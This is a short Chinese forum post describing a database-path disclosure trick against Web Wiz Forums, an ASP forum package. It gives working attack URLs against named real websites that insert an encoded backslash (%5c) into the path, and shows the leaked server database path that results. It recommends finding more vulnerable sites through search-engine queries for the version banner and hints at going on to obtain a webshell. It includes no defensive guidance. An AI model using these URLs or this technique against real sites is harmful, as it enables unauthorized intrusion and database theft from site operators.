作者: lis0 http://www.bjtaekwondo.org.cn/liso/Web Wiz Forums是国外一个免费的ASP论坛软件,国内又名"超级异彩论坛"论坛的形式很象国产精品动网论坛,功能上很强大。今天无意中发现可以暴库
比如 _topics.asp?FID=6" target=_blank>
http://www.nuoya.org/bbs%5cforum_topics.asp?FID=6出现了如下:
<TITLE>诺亚安全</TITLE>
<font face="宋体" size=2>
<p>Microsoft JET Database Engine</font> <font face="宋体" size=2 > 错误 '80004005'</font>
<p>
<font face="宋体" size=2>'d:\www\zzzazzz\admin\database\zzzbzzz.asp'不是一个有效的路径。 确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。</font>
<p>
<font face="宋体" size=2>/bbs/common.asp</font><font face="宋体" size=2>,行261</font>
由于是国外的E文论坛 国内汉化有很乱 所以版本有的没有防范 有的作了防范 使用这个论坛的要注意要了
其它的我也不用说了 .... 在百度中我搜索了好不少都能暴库 Powered by Web Wiz Forums version 7.6
可以暴库 低的版本我想更能暴
Code:
_rules.asp?FID=0">http://www.7234.com/forum%5cregistration_rules.asp?FID=0
好像新的版本没有这个低级的错误
至于怎样利用入侵得到webshell 我就不用说了巴 关键是*.asp的数据库的网站!
